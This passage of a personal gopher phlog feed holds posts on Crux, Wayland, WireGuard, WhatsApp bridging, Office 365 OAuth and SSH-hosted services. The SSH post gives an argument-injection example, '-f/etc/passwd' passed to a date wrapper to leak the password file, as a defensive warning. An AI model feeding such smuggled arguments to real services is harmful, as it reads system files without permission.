# Crux and the X-less ports

As of November 2020, we're going into lockdown again, as the (in)famous
"second wave" of Covid-19 strikes. Since I get to spend more time at
home, I decided to reinstall Crux on the SSD, with a special twist this
time:

The X server won't be installed at all !

This will force me into embracing and understanding Wayland if I want
to use my computer. As time passes, I'll certainly hit some
shortcomings of Wayland, but I'm determined to actively participate in
its deployment this time !

I first gave Wayland a quick try (using X11 as the backend), to make
sure that the software I planned on using (wio, cage, alacritty and
firefox) was usable under Wayland, and started porting it to Crux.
I made myself a "wayland" ports tree, and started looking into what is
needed to run Wayland natively on my desktop.

I'll be documenting what I find along the way, and collecting thoughts
on my findings. You'll find them in my gopher hole, under
/notes/wayland, along with this "introduction".

As a conclusion, I'll say this:

Only fools never change their minds. Don't hate on a technology just
because you don't see the point, or don't understand it, because you
might embrace it later on.
Unless it's systemd. It just plain sucks.

Be happy, stay cool, and contribute ! ☮️


20201106.1728]]></content>

              </entry>
<entry>

              <title><![CDATA[My top 10 commands]]></title>

              <id>gopher://phlog.z3bra.org/0/my-top-10-commands.txt</id>

              <link href="gopher://phlog.z3bra.org/0/my-top-10-commands.txt" />

              <updated>2020-10-27T23:36:00+01:00</updated>

              <author><name>wgs</name></author>

              <content type="text"><![CDATA[                                                   My top 10 commands
──────────────────────────────────────────────────────────────────────
“Show me what you type and I'll tell you who you are”

This week, my shell command history hit 10000 lines ! To celebrate, I
decided to check which 10 commands I use the most:

   $ history|awk '{print $2}'|sort|uniq -c|sort -rn|head -n 10
   1550 v
   1492 ll
    870 make
    787 cd
    503 git
    426 pwd
    372 fg
    245 ssh
    206 doas
    192 man

1. v (alias « vis »)

Fortunately, I was smart enough to alias my most used command to a
single letter ! "v" is an alias for "vis", my text editor of choice. I
use my computer mostly for programming and editing server configs, and
the fact that my editor tops the list proves it ! Nothing really
interesting here after all...

2. ll (alias « ls -l »)

If I could only have a single-key keyboard, I'd pick « L » as the
only letter. I call this one my stress-ball. Whenever I'm thinking, or
need to relieve stress, I type « LL <enter> », immediately followed
by « <control> L » to clear the screen, so I can run « LL » again.

3. make

Now this is getting interesting ! Do I do so much C programming that
I use « make » this often ? Actually, no. I use « make » for another
purpose: server configuration. I own multiple servers online, and
configure them with drist [0], which is similar to ansible. To simplify
configuration deployment, I use a Makefile, so I just need to type
« make » to reconfigure a server. Every time I change a config file,
add a DNS name, or a username, I run « make » to apply my changes,
which is why it shows up so often.

I also build a lot of C programs, but configuration management is
certainly my main usage these days.

4. cd

There is one thing that frustrates me when I look at other people using
a terminal :

   cd /var
   cd log
   less messages

When people do that, I want to take the keyboard away from them, and
beat them up with it !!
Ok I'm weird. But seriously, I hate monkeying around in my filesystem.
If I want to read the logs, I'll just

   less /var/log/messages

It works, it's elegant, and it makes « cd » appear only 4th in your
command history rather than first 😉

5. git

Well, I didn't know I used git that much. It shouldn't surprise me
though, because I'm constantly searching for cool new projects to try,
and git cloning them.
My other big use for git is updating my ports tree, as I run the crux
distro [1], with a lot of git-based ports.

6. pwd

I get lost quite often in all these gigabytes !

7. fg (and its friend ^Z)

This is certainly the most idiomatic command of my programming
workflow. I mostly write shell scripts and C programs, which I
test/build manually at the shell prompt. I could use a terminal
multiplexer, but I like having a single place to focus my attention on.
A typical programming session would look like this:

   v file.c   # see command number 1
   ^Z
   make
   [...] output omitted
   fg
   ^Z
   make
   ./file
   git add file.c; git commit -m "WOW it works !"
   fg
   man 3 gethostbyname
   ^Z
   fg %1
   ^Z
   fg %2
   ...

I bring my editor to the foreground all the time. Even though it has
support for splitting windows, I run it multiple times when editing
multiple files, and play with job ids to call them back. It might sound
slow, but I'm really used to it and feel pretty efficient. I
must admit that sometimes when I'm tired, I might end up with the same
file opened 3 times in 3 different jobs... This is usually a good sign
that I need some sleep !

8. ssh

What would be life without exploration ?

I use it mostly to administer my servers, or connect to my IRC session,
which is hosted on one of these servers. Nothing fancy here.

9. doas

This is the OpenBSD equivalent of « sudo ». Since I reinstalled all
my servers with OpenBSD, I started using « doas » to administer them (I
never log in as root). I got so used to it that I started typing «
doas » instead of « sudo » on my own machine. And as crux doesn't
come with « sudo » installed by default, I eventually replaced it
with « doas ». The same phenomenon is happening with « rcctl » vs.
« systemctl » on my work laptop. I might add an alias someday !

10. man

To be honest, I'm proud to see it in this list. I love man pages, and
prefer them over stackoverflow answers. With OpenBSD, I learnt to use
them more, and got into the habit of reading the manual instead of
searching the internet. This helped me a lot when programming on planes
or trains, where you must work offline. I'm proud to finally have proof
that I RTFM !




What started as an idle question ended up as a good introspection into
my terminal habits. This was a fun exercise, and I would recommend it
to everyone who uses a terminal often.

Now what are YOUR top 10 commands ?
--
~wgs

[0]: gopher://phlog.z3bra.org/0/configuration-management.txt
[1]: https://crux.nu

20201027.2336]]></content>

              </entry>
<entry>

              <title><![CDATA[Official nixers.net gopher space]]></title>

              <id>gopher://phlog.z3bra.org/0/official-nixers.net-gopher-space.txt</id>

              <link href="gopher://phlog.z3bra.org/0/official-nixers.net-gopher-space.txt" />

              <updated>2020-09-17T15:59:00+02:00</updated>

              <author><name>wgs</name></author>

              <content type="text"><![CDATA[                                     Official nixers.net gopher space
──────────────────────────────────────────────────────────────────────

I recently came back to the gopherspace, and wanted to bring more
people with me this time, so I'd have others to discuss it with. To
achieve that, I built a new server (xaero.z3bra.org) to host a
gopherspace for the nixers.net community.

I hope we'll also see cool contributions to the gopherspace from the
members, as a bunch of people were curious about gopher, without knowing
how to get started with it.

The gopher hole is accessible here:

   gopher://g.nixers.net

If you want an account, feel free to contact me, and perhaps join the
nixers.net forums [0]; you'll be welcome !

=====

This is the second time I've built a multi-user machine, so I'm still
learning how to configure a host that might be accessed by "strangers".

This community is small, so I doubt I'll encounter any hostile behavior
from the users. However, I'd still like to learn how to properly
configure that remote access, and limit its resources. Guess I'll have
to read that scary login.conf(5) after all…

I hope I'll manage to keep the system clean, and under control. It's
currently managed with drist(1) (thanks again, solene !). But I'd like
to make it more of a gateway where people can connect to access more
stuff, like the yggdrasil or dn42 networks. I'll see what people are
interested in.

Wish me luck !
--
~wgs

[0]: https://nixers.net

20200917.1559]]></content>

              </entry>
<entry>

              <title><![CDATA[Old Computer Challenge V3]]></title>

              <id>gopher://phlog.z3bra.org/0/old-computer-challenge-v3.txt</id>

              <link href="gopher://phlog.z3bra.org/0/old-computer-challenge-v3.txt" />

              <updated>2023-07-18T22:07:00+02:00</updated>

              <author><name>wgs</name></author>

              <content type="text"><![CDATA[                                            Old Computer Challenge V3
──────────────────────────────────────────────────────────────────────
> gopher://occ.deadnet.se/1/users

Day 0
=====
I only learnt about the challenge on its first day. Luckily, I have the
perfect challenger for this task: my trusty Acer Aspire One from 2009.
Equipped with an Intel Atom clocked at 1.6GHz, 1GiB of RAM and a 250GB
hard drive, it barely needed any limitation to fit the challenge.

I grab it from the shelf, blow the dust off it and power it on.
Without much surprise, it boots into the 5-year-old Void Linux I had
set up and forgotten about.

I plug it in to refill it with some juice, and end the day.

Day 1
=====
I decide to finally install OpenBSD on this thing, and make it work.
Years ago I had issues with the WiFi card not being usable, but that
should be fixed by now, right?

Obviously not.

After failing to use urndis(4) to share my phone's connection over USB,
I eventually found a working WiFi card in an Asus Eee PC from the same
era.

It took me quite some time and patience, but I got OpenBSD up and
running, with reliable internet access!

The rest of the day is spent setting up my environment, which features
many programs that must be compiled, either to configure them or
because they're not packaged:

- abduco      0.6
- dmenu       5.2
- glazier     1.1
- human       0.3
- lel         0.2
- libwm       1.3
- pm          1.4
- randr       0.0
- sacc        1.06
- webdump     0.0
- wmutils     1.7
- xmenu       0.0
- xrectsel    0.3.2
- xscreenshot 0.0
- xwait       5.7

And that's where I hit my first OCC limit: with a single core at 1GHz,
everything is slow when you're compiling stuff in the background!
Luckily, these programs compile rather fast, so I just had to wait a
few seconds before using the computer again.

With the environment set up, it was time to actually use the computer.
So I decided to brag about it on the web. I knew for a fact that
firefox cannot run on this machine, even at its full potential, because
I had already tried, and failed miserably. So I installed netsurf right
away as my gateway to the world wide web.

And here is the second limit: it turns out that netsurf doesn't start
with Javascript enabled. 512MiB of RAM just isn't enough for it
apparently, so I disabled that. I could browse a few websites and
access the online resources I needed to fix issues with my OpenBSD
configuration, but that's pretty much it. The web of today requires
javascript to interact with it.

I close the notebook on this unsurprising fact.

Day 2
=====
Unfortunately, this would be my last day of the challenge. I would be
on holiday the next day, with no plans to do any computing. It would
also be a very short day, as my workday turned out to be very busy.

I simply spent the night chatting on IRC from this cool little notebook,
happy that I revived it once again for no valid reason :)


Closing word
============

I cannot consider this challenge a success. I came in too late, and
could only use the notebook for 2 days, without doing anything
meaningful.

I'm however happy to finally have been able to slap OpenBSD on it, and
I'll definitely keep using this thing when I'm on the go, as the form
factor is simply too practical! The battery is also surprisingly good
for a cheap computer from the past decade.

I'll definitely use it again for next year's challenge ;)


Bonus
=====

Pictures of "sorlag":

gopher://z3bra.org/I/u/sorlag-outside.jpg
gopher://z3bra.org/I/u/sorlag-inside.png


20230718.2207]]></content>

              </entry>
<entry>

              <title><![CDATA[Online messaging]]></title>

              <id>gopher://phlog.z3bra.org/0/online-messaging.txt</id>

              <link href="gopher://phlog.z3bra.org/0/online-messaging.txt" />

              <updated>2020-08-25T08:43:00+02:00</updated>

              <author><name>wgs</name></author>

              <content type="text"><![CDATA[                                                     Online messaging
──────────────────────────────────────────────────────────────────────

An XKCD comic is worth a thousand words.

https://imgs.xkcd.com/comics/standards.png

There is no standard when it comes to online communication.

IRC used to be the way people communicated online. This is not true
anymore however, and with all the new protocols, platforms and
applications that pop up every now and then, communication is easier
than ever !

Easier ? Not so much.

To communicate with 3 different groups of people, you need 3 different
applications. Be it Facebook Messenger, Telegram, Whatsapp, Matrix,
Mattermost, Discord, …, you name it.

Each requires creating an account, turning on notifications, learning
the UI, and so on, and so forth.

Of course, none of these could agree on a standard way to relay text
messages from one device to another! So now it is your problem, as a
user, to deal with switching contexts.

But maybe you don't have to…

# Matterbridge

By relaying messages from one platform to the others, [matterbridge][0]
is the kind of project that provides an elegant solution to an ugly
problem.

It connects to many of the existing messaging platforms, and bridges
them together. When a message is received on one platform, the
matterbridge gateway replays it to all the other configured platforms,
so people can effectively talk to each other in a cross-application
manner.

I use it to participate in a local group from my hometown on WhatsApp,
which I don't want installed on my personal phone. It relays all
messages to IRC, and to a telegram group, so I can still participate
from my phone.
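For reference, the heart of such a setup is a single matterbridge.toml
declaring each account plus a gateway tying them together. The sketch
below is from memory, and every name, token and channel id in it is a
placeholder; check the matterbridge wiki for the exact keys:

```toml
# matterbridge.toml (sketch; all identifiers below are placeholders)

[irc.myirc]
Server="irc.example.org:6697"
Nick="bridgebot"
UseTLS=true

[telegram.mytg]
Token="123456:replace-with-botfather-token"

[[gateway]]
name="hometown"
enable=true

[[gateway.inout]]
account="irc.myirc"
channel="#hometown"

[[gateway.inout]]
account="telegram.mytg"
channel="-1001234567890"
```

One [[gateway.inout]] block per platform is enough to relay messages
in both directions.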

# Whatsapp

In order to use whatsapp with matterbridge, you need an account (so a
phone number), and a way to "authorize" matterbridge to use this
account.

The only way to do it (at least as of matterbridge v1.18.0) is by
tricking whatsapp into thinking that matterbridge is a web browser, so
it can use the whatsapp [web version][1].
The web version doesn't replace the original application, so you have
to keep the latter running all the time.

As I didn't want whatsapp to run on my phone, I had to find another way.

# Android VM

The android SDK provides an emulator that you can run in headless mode.
What happens under the hood is that a qemu virtual machine is started
for your phone's architecture (even x86_64!).

The procedure to get whatsapp running on a VM is described here:

https://github.com/tulir/mautrix-whatsapp/wiki/Android-VM-Setup

This includes feeding the phone's webcam with an ffmpeg recording of
your desktop, so you can scan the QR code created by matterbridge from
whatsapp, and allow it to run (you MUST run the emulator in graphical
mode at this point, so a working android SDK is needed).

Unfortunately, the emulator only runs on Linux, so I couldn't host it
on one of my OpenBSD servers. To make things simpler, I chose to
install a Debian 10, where the SDK installation is easy.

       apt install android-sdk libopengl0 libxdamage1 libtinfo5 libgl1 libegl1-mesa
       curl -O https://dl.google.com/android/repository/commandlinetools-linux-6609375_latest.zip
       unzip -d /usr/lib/android-sdk commandlinetools-linux-6609375_latest.zip
       /usr/lib/android-sdk/tools/bin/sdkmanager 'system-images;android-30;google_apis_playstore;x86_64' emulator
       /usr/lib/android-sdk/tools/bin/sdkmanager --update

You'll need that on both your server and local machine. Then you can
create the android emulator locally, and start it:

       /usr/lib/android-sdk/tools/bin/avdmanager create avd -n whatsapp -k 'system-images;android-30;google_apis_playstore;x86_64'
       /usr/lib/android-sdk/emulator/emulator -avd whatsapp

Once it is running, install the whatsapp application, connect it to
your account and make sure it works. Follow the guide I mentioned
earlier to link it to matterbridge.
Don't forget to authorize the ADB key fingerprint at boot, so you can
later connect to the emulator from the command line.

Once done, take a snapshot of the emulator, and shut it down. The full
emulator state should be saved to ~/.android/avd, and the adb key to
~/.android/adbkey.

Upload the whole ~/.android to your server, and start the emulator in
headless mode:

       /usr/lib/android-sdk/emulator/emulator -avd whatsapp -no-audio -no-window

After some time you should be able to connect to it using `adb shell`.
Use this connection to start the application (and, if the emulator has
no internet access, enable the wifi card first):

       adb shell 'svc wifi enable'
       adb shell 'ping web.whatsapp.com'
       adb shell 'am start -n com.whatsapp/.HomeActivity'

At this point, the VM should be up and running, with whatsapp started
and in the foreground ! You can verify it by taking a screenshot:

       adb shell 'screencap -p' > capture.png

In case you want to tap the touchscreen remotely, you can use

       adb shell 'input tap X Y'

where X and Y are the coordinates of where you want to tap. Not very
comfortable to use, but it might be handier than stopping the VM,
starting it again locally, snapshotting it, re-uploading, …
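To make remote tapping less tedious, the two commands can be wrapped in
a small helper. This is a hypothetical convenience function (assuming
`adb` is in your PATH and a single emulator is attached) that sends a
tap and immediately saves a screenshot, so you can see what each tap
did:

```shell
#!/bin/sh
# tap_and_peek X Y: tap the given screen coordinates, then save a
# screenshot named after them so the result can be inspected locally.
tap_and_peek() {
    x=$1 y=$2
    adb shell "input tap $x $y"
    adb shell 'screencap -p' > "tap-$x-$y.png"
    echo "saved tap-$x-$y.png"
}
```

Calling `tap_and_peek 540 960` would tap the middle of a 1080x1920
screen and leave a tap-540-960.png behind for inspection.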

# Rationale

https://imgs.xkcd.com/comics/team_chat.png

[0]: https://github.com/42wim/matterbridge
[1]: https://web.whatsapp.com

20200825.0843]]></content>

              </entry>
<entry>

              <title><![CDATA[partage: An HTTP based file sharing system]]></title>

              <id>gopher://phlog.z3bra.org/0/partage-an-http-based-file-sharing-system.txt</id>

              <link href="gopher://phlog.z3bra.org/0/partage-an-http-based-file-sharing-system.txt" />

              <updated>2021-10-21T14:34:00+02:00</updated>

              <author><name>wgs</name></author>

              <content type="text"><![CDATA[                           partage: An HTTP based file sharing system
──────────────────────────────────────────────────────────────────────
In the past weeks, I had to share files with a company, and they didn't
fit in an email. We're approaching 2022, yet sharing big files
anonymously remains a pain in the ass…

So I started looking around for self-hosted solutions, and it turns out
there are quite a few [0] !
What I needed was a simple solution that runs on OpenBSD, and that I
could link to my family and friends so they can share stuff with me. It
had to be fairly straightforward to use, with sane defaults and a low
barrier to entry.
I first settled on linx-server [1]. It works well without javascript,
is fairly simple to install, and can interact with httpd(8) over
FastCGI!

The only things I missed were the ability to chroot and to run with
restricted privileges, so I decided to hack those features in. I had
never really written any Go before, but I quickly realized how rich the
standard library is! Reading and understanding the code felt familiar
coming from C. I quickly added the features I needed, and set up my
server.

I kept reading the code out of curiosity, and that's when my NIH
syndrome triggered…

A few days later, partage [2] was born!

Partage is a simple HTTP server that accepts uploads over PUT and POST
requests, and stores files under randomized names. Each file is set to
expire after a defined amount of time, and an external tool
(partage-trash(1)) can be used to "collect" expired files (usually from
a cronjob).

A nice-looking landing page is provided by default (with minimal CSS
and Javascript) for marketing purposes, but the server can totally work
without a front-end.

Overall, writing this software was very cool! I'm truly amazed at how
simple Go is to use, and how similar to C it feels. The standard
library is complete, and cross-compiling is a breeze. I'll definitely
consider it again for future projects!
--
~wgs

[0]: https://github.com/awesome-selfhosted/awesome-selfhosted
[1]: https://github.com/ZizzyDizzyMC/linx-server
[2]: gopher://z3bra.org/0/projects/partage.txt

20211021.1434]]></content>

              </entry>
<entry>

              <title><![CDATA[Re: Gopher text rendering ideas]]></title>

              <id>gopher://phlog.z3bra.org/0/re-gopher-text-rendering-ideas.txt</id>

              <link href="gopher://phlog.z3bra.org/0/re-gopher-text-rendering-ideas.txt" />

              <updated>2020-09-25T16:40:00+02:00</updated>

              <author><name>wgs</name></author>

              <content type="text"><![CDATA[                                      Re: Gopher text rendering ideas
──────────────────────────────────────────────────────────────────────

So I gave it a quick try using my gopher web proxy. It worked as such:

0. Read the whole text file into memory
1. Search for "\n\n", mark it as the end of a paragraph
2. Search for "   " (3 spaces) inside that paragraph
3.0 No occurrence ? Wrap the paragraph in <p> tags
3.1 Matched ? Wrap the paragraph in <pre> tags
4. Move the pointer past the paragraph
5. Start over till EOF

It worked great overall ! I browsed a few holes like this, and all the
ASCII art / code snippets rendered perfectly. Actual text paragraphs
were also pleasant to read with a proportional font.
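For the record, the whole heuristic fits in a few lines of awk, using
its "paragraph mode" (RS="") to split on blank lines. This is just a
sketch of the idea, not the actual proxy code:

```shell
# txt2html: wrap blank-line-separated paragraphs in <p> tags, except
# those containing a run of 3 spaces, which get <pre> tags instead.
txt2html() {
    awk 'BEGIN { RS=""; ORS="\n\n" }
         /   / { print "<pre>" $0 "</pre>"; next }
                { print "<p>" $0 "</p>" }'
}
```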

However,

A few things I hadn't thought about looked odd, because the <p> tag
reflows text by default. Things like lists or quoted text looked bad:

1. First item 2. Second item 3. Third item

> This was a quoted text with > hard wraps in it, that should
definitely > not be reflowed.

Some texts or graphic stuff looked odd as well, like banners like this
that are 70 char wide:

||<><><><><><><....>||

As a conclusion, I think that my « naive » approach was a bit too
naive, so I reverted to a full monospace font for the time being, until
I find a better way to do it, or give up on it entirely.

If someone has an idea, feel free to contact me to discuss it !
--
~wgs
20200925.1640]]></content>

              </entry>
<entry>

              <title><![CDATA[Reflowing emails with fmt(1)]]></title>

              <id>gopher://phlog.z3bra.org/0/reflowing-emails-with-fmt1.txt</id>

              <link href="gopher://phlog.z3bra.org/0/reflowing-emails-with-fmt1.txt" />

              <updated>2020-09-09T14:42:00+02:00</updated>

              <author><name>wgs</name></author>

              <content type="text"><![CDATA[                                         Reflowing emails with fmt(1)
──────────────────────────────────────────────────────────────────────
scribo(1) can now filter the message body through a command rather
than writing it directly to the file. The advantage is that I can
reformat the mails with, e.g., fmt(1), or even turn markdown into HTML,
or strip HTML tags. So many possibilities !

This fixes the issue I have when sending mails from my phone, which
doesn't wrap text at a given column. This way I can type however I want
and rest assured that my entry will be nicely rendered !

EDIT: it actually looks nicer when reflowing with fold(1), as it
won't refill lines.
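A toy example shows the difference: fmt(1) refills the paragraph,
joining short lines, while fold(1) only breaks lines longer than the
limit and leaves short ones alone (exact behavior may vary slightly
between implementations):

```shell
# fmt joins the two short lines into one refilled paragraph...
printf 'one short line\nanother short line\n' | fmt -w 72
# ...while fold keeps the original line breaks, since nothing
# exceeds the 72-column limit
printf 'one short line\nanother short line\n' | fold -w 72
```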
--
~wgs

20200909.1442]]></content>

              </entry>
<entry>

              <title><![CDATA[Replacing tinc with wireguard]]></title>

              <id>gopher://phlog.z3bra.org/0/replacing-tinc-with-wireguard.txt</id>

              <link href="gopher://phlog.z3bra.org/0/replacing-tinc-with-wireguard.txt" />

              <updated>2021-09-28T18:04:00+02:00</updated>

              <author><name>wgs</name></author>

              <content type="text"><![CDATA[                                        Replacing tinc with wireguard
──────────────────────────────────────────────────────────────────────
After a few months of heavy procrastination, I finally replaced my old
tinc[0] mesh VPN with wireguard[1].

Since version 6.8, OpenBSD ships with the wg(4) driver by default,
providing ifconfig(8) with all the tools required to set up a wireguard
VPN.
You don't even need the (in)famous wireguard-tools package !

Generating the private key is done with openssl(1):

   openssl rand -base64 32
   y4mJJGiPwpZIauJlZuDSY0f+Dqx8UPD9WGD0fQvzkK4=
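As a sanity check: a wg(4) key is just 32 random bytes, and
base64-encoding 32 bytes always yields exactly 44 characters (43 plus
one '=' of padding). Handy when scripting the generation:

```shell
# a wgkey is 32 random bytes; base64 turns 3 bytes into 4 chars,
# so 32 bytes encode to ceil(32/3)*4 = 44 characters
key=$(openssl rand -base64 32)
echo "${#key}"   # prints 44
```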

You can then put it in /etc/hostname.wg0, along with your peers'
public keys:

# /etc/hostname.wg0
inet 10.0.0.1 255.255.255.240
wgport 51820 wgkey y4mJJGiPwpZIauJlZuDSY0f+Dqx8UPD9WGD0fQvzkK4=
wgpeer FbRKfD8E6D/6xIHJqpigq0I6DYe63pF/ak1FArQXoDA= wgendpoint peer1.domain.tld 51820 wgaip 10.0.0.2
wgpeer z6sXdKvJAYnjqL2pTUoG8U+mzj19lcgUdfHXV8pLAkQ= wgendpoint peer2.domain.tld 51820 wgaip 10.0.0.3
up

The public key is printed along with the other interface attributes,
under the name "wgpubkey". Use ifconfig(8) to get it:

   doas ifconfig wg0 | grep wgpubkey

So far it does the job just as well as tinc, but as it's built into the
kernel, no external tool/daemon is required, which is really nice.

I also managed to automate the whole setup (generate priv keys,
distribute public ones) thanks to drist(1).

keep hacking!
--
~wgs

[0]: https://tinc-vpn.org
[1]: https://wireguard.com

20210928.1804]]></content>

              </entry>
<entry>

              <title><![CDATA[RIP M$ basic auth support 💀]]></title>

              <id>gopher://phlog.z3bra.org/0/rip-microsoft-basic-auth-support.txt</id>

              <link href="gopher://phlog.z3bra.org/0/rip-microsoft-basic-auth-support.txt" />

              <updated>2022-10-25T18:59:00+02:00</updated>

              <author><name>wgs</name></author>

              <content type="text"><![CDATA[                                 RIP M$ basic auth support 💀
──────────────────────────────────────────────────────────────────────
Microsoft must hate their users.

I've seen the news come up a few times, thinking it was nothing
but a joke. But here we are: Basic authentication for microsoft exchange
is dead 💀.

This means that the only way to authenticate to your office 365 mail
box is using the XOAuth2 mechanism. And hear me out, it's a pain!

However, I'm not writing this post as yet another rant against
microsoft. It is a brain dump of what I did to get it working again,
because I'll need it sooner or later (and you'll probably need it
too!).

# Process

This will let you retrieve/send email with isync/msmtp respectively. At
the end of the day, you'll still use a username/password, it's just that
getting that "password" (XOAUTH2 token) is a pain in the neck.

0. Get a stress ball, put it somewhere close to you
1. Login to https://portal.azure.com with your email account
2. Navigate to the "App Registration" page (use the searchbar)
3. Register a new "app"
       3.0 Name it "blebleble" (this is important)
       3.1 Select "Single tenant" access
4. Authentication
       4.0 Add platform: Mobile + Desktop
       4.1 Set redirect URI: http://localhost
       4.2 Advanced settings Allow public client flow: YES
5. API Permissions
       5.0 Microsoft Graph: (allow them all, really…)
               - email
               - offline_access
               - IMAP.AccessAsUser.All
               - POP.AccessAsUser.All
               - SMTP.Send
               - User.Read
6. Overview: copy "client" and "tenant" ID
7. Download xoauth2.py[0] (modified by me, thank you sir Perlis!)
8. Replace TENANT_ID and CLIENT_ID in the source with your own
       8.1 (Optional) edit ENCRYPTION_PIPE/DECRYPTION_PIPE
           This currently uses cat(1). Use a decent crypto tool if you
           care, like cream[1] or age
9. xoauth2 ~/.cache/o365.token -a
       9.0 OAuth2 registration: microsoft
       9.1 OAuth2 flow: localhostauthcode
       9.2 Account email address: [email protected]
       9.3 Navigate the link
       9.4 Accept permissions

VOILÀ! 😫🔫

You should now be authorized to read your emails.

Use the command `xoauth2 ~/.cache/o365.token` to get your current access
token, and use it as your password. Here is my own ~/.mbsyncrc for
reference:

       IMAPAccount o365
               Host outlook.office365.com
               Port 993
               User [email protected]
               PassCmd "xoauth2 ~/.cache/o365.token"
               SSLType IMAPS
               SSLVersions TLSv1.2 TLSv1.3
               AuthMech XOAUTH2
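
For the sending side, msmtp can call the same helper through its
passwordeval option. A sketch of ~/.msmtprc (host, port and the
example.com address are assumptions; double-check them against your
tenant):

       account o365
               host smtp.office365.com
               port 587
               tls on
               auth xoauth2
               user you@example.com
               from you@example.com
               passwordeval "xoauth2 ~/.cache/o365.token"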

Notes: For mbsync, you'll need to install the Cyrus sasl2-xoauth2 module

       The xoauth2 token is stored unencrypted on disk. Look for
       ENCRYPTION_PIPE and DECRYPTION_PIPE in xoauth2.py to handle
       encryption if you care (current encryption tool: cat(1)).
--
~wgs

[0]: gopher://z3bra.org/0/notes/xoauth2.py
[1]: gopher://z3bra.org/0/projects/cream.txt

20221025.1859]]></content>

              </entry>
<entry>

              <title><![CDATA[SSH as a public service]]></title>

              <id>gopher://phlog.z3bra.org/0/ssh-as-a-public-service.txt</id>

              <link href="gopher://phlog.z3bra.org/0/ssh-as-a-public-service.txt" />

              <updated>2022-08-23T17:26:00+02:00</updated>

              <author><name>wgs</name></author>

              <content type="text"><![CDATA[                                              SSH as a public service
──────────────────────────────────────────────────────────────────────
As the HTTP protocol becomes more and more ubiquitous for online
services, I've looked into other protocols that could expose services
online.

It turns out that ssh is a perfect candidate for that !
I've seen a couple examples in the wild, and there might be more:

       ssh [email protected]
       ssh [email protected]

So I decided to look into it myself, and set it up on my OpenBSD server.


0. Service program
------------------

First, you'll need a program to provide your service. We'll make a
program that gives the current day.

       # cat <<EOF > /usr/local/bin/today.sh
       #!/bin/sh
       date '+%A !'
       EOF
       # chmod +x /usr/local/bin/today.sh
       # /usr/local/bin/today.sh
       Tuesday !

You'll probably want something more useful, and we'll get to it later
on. For now, this will be enough.


1. Service account
------------------

It all starts with an account that you'll use to connect to the
machine and run the program. This account must not have a password,
and must have restricted access to system resources.

So let's first create a login class for these users, to limit their
resource usage on the system:

       # cat <<EOF > /etc/login.conf.d/sshervice
       sshervice:\
               :path=/bin /usr/bin /usr/local/bin:\
               :umask=022:\
               :datasize=1024M:\
               :maxproc=32:\
               :openfiles=128:\
               :stacksize=1M:\
               :filesize=512M:
       EOF
       # cap_mkdb /etc/login.conf

See login.conf(5) for how to tweak these values to your liking.

       # groupadd _sshervice
       # adduser -d /var/sshervice \
               -L sshervice \
               -g _sshervice \
               -s /bin/sh \
               -p '' \
               today

At this point, you should be able to get a shell for your service
account without specifying a password (try as non-root user):

       $ su - today
       $ /usr/bin/whoami
       today
       $ pwd
       /var/sshervice


2. SSH access
-------------

You can log in as this user, but it shouldn't be accessible from the
outside, because of how insecure it is (at least that's the case on
OpenBSD).

Thanks to the "Match" keyword, OpenSSH can apply specific configuration
bits to a user or a group (see sshd_config(5) for details). So we'll
use that:

       # cat <<EOF > /etc/ssh/sshd_config_sshervice
       Match User today
               ForceCommand /usr/local/bin/today.sh

       Match Group _sshervice
               PasswordAuthentication yes
               PermitEmptyPasswords yes
               DisableForwarding yes
               ForceCommand /sbin/nologin
               MaxSessions 5
       EOF
       # echo 'Include sshd_config_sshervice' >>/etc/ssh/sshd_config
       # rcctl restart sshd


3. Final result
---------------

       $ ssh [email protected]
       Tuesday !


4. Going further
----------------

From there, it's all a matter of providing cool and/or useful services,
so you'll have to improve what's running as the "ForceCommand" of your
user.

Here are a few tips, in no particular order:

---

Read login.conf(5) and sshd_config(5). Really, do it.

---

Remember that you're giving strangers the ability to run programs on
your server. Take extra care not to give them any way to obtain a
shell. For example:

       #!/bin/sh
       date "$1"

This looks harmless, but passing it "-f/etc/passwd" would leak its
full content line by line in the error messages. So take extra care
with the commands you allow !

---

Worth mentioning is that you can chroot(8) your service over ssh with
the following line under the "Match" block of sshd_config(5):

       ChrootDirectory /var/sshervice

This requires setting up a proper chroot for your service to run the
program correctly.

---

Never trust user input.
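
A cheap way to honour this rule in a ForceCommand script is to
whitelist characters before handing user input to anything. A sketch
only: the allowed character class and the date(1) usage are examples,
tailor them to your actual service.

```shell
#!/bin/sh
# Refuse any input containing a character outside the whitelist,
# then hand the sanitized string to date(1) as a format.
safe_date() {
	fmt="${1:-%A}"
	case "$fmt" in
	*[!A-Za-z0-9%:-]*)
		echo 'invalid format' >&2
		return 1 ;;
	esac
	date "+$fmt"
}

safe_date '%Y-%m-%d'
safe_date '-f/etc/passwd' || echo 'rejected'
```

In the ForceCommand script you would call it as
safe_date "$SSH_ORIGINAL_COMMAND".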

---

Use the environment variable `$SSH_ORIGINAL_COMMAND` to allow users
to specify commands. Given the following script:

       #!/bin/sh
       date -- "+${SSH_ORIGINAL_COMMAND:-%A !}"

You can now specify the date format on the command line:

       $ ssh [email protected]
       Tuesday !
       $ ssh [email protected] %Y-%m-%d
       2022-08-23

---

Prefer self-contained programs over scripts.
Ideally statically link and chroot them.

---

If your program requires a TTY to run (like a pager for example), don't
forget to pass `-t` when you specify a command over ssh, because ssh
does not allocate a pseudo-TTY by default when given a command.

Imagine an online man page service:

       #!/bin/sh
       man "${SSH_ORIGINAL_COMMAND:-man}"

Make sure to add -t to force a pseudo TTY allocation for the pager to
work:

       $ ssh -t [email protected] sshd_config

20220823.1726]]></content>

              </entry>
<entry>

              <title><![CDATA[The gophirst approach]]></title>

              <id>gopher://phlog.z3bra.org/0/the-gophirst-approach.txt</id>

              <link href="gopher://phlog.z3bra.org/0/the-gophirst-approach.txt" />

              <updated>2020-09-13T16:47:00+02:00</updated>

              <author><name>wgs</name></author>

              <content type="text"><![CDATA[                                                The gophirst approach
──────────────────────────────────────────────────────────────────────

Plain text makes things easier.

That's why I like gopher more and more, and want to make gopher my main
way to publish content on the internet.
However, I am not ready to completely abandon the web. I still want
everything to be accessible online by people using the inferior HTTP
protocol.

It is from this idea that I started phroxy [0], an inetd(8) HTTP to
gopher proxy.  You can clone the project over git:

   git clone git://z3bra.org/phroxy.git

It is far from ready, but can already serve text files !
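
Since an inetd(8) service only ever reads a request on stdin and
writes the response to stdout, wiring it up is a one-liner. A
hypothetical /etc/inetd.conf entry (binary path and user are made up
for the example):

   # spawn one phroxy process per incoming HTTP connection
   www stream tcp nowait _phroxy /usr/local/bin/phroxy phroxy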

The goal is to resemble what's running at proxy.vulpes.one [1]. As I
could not find the code for it, I decided to write my own.

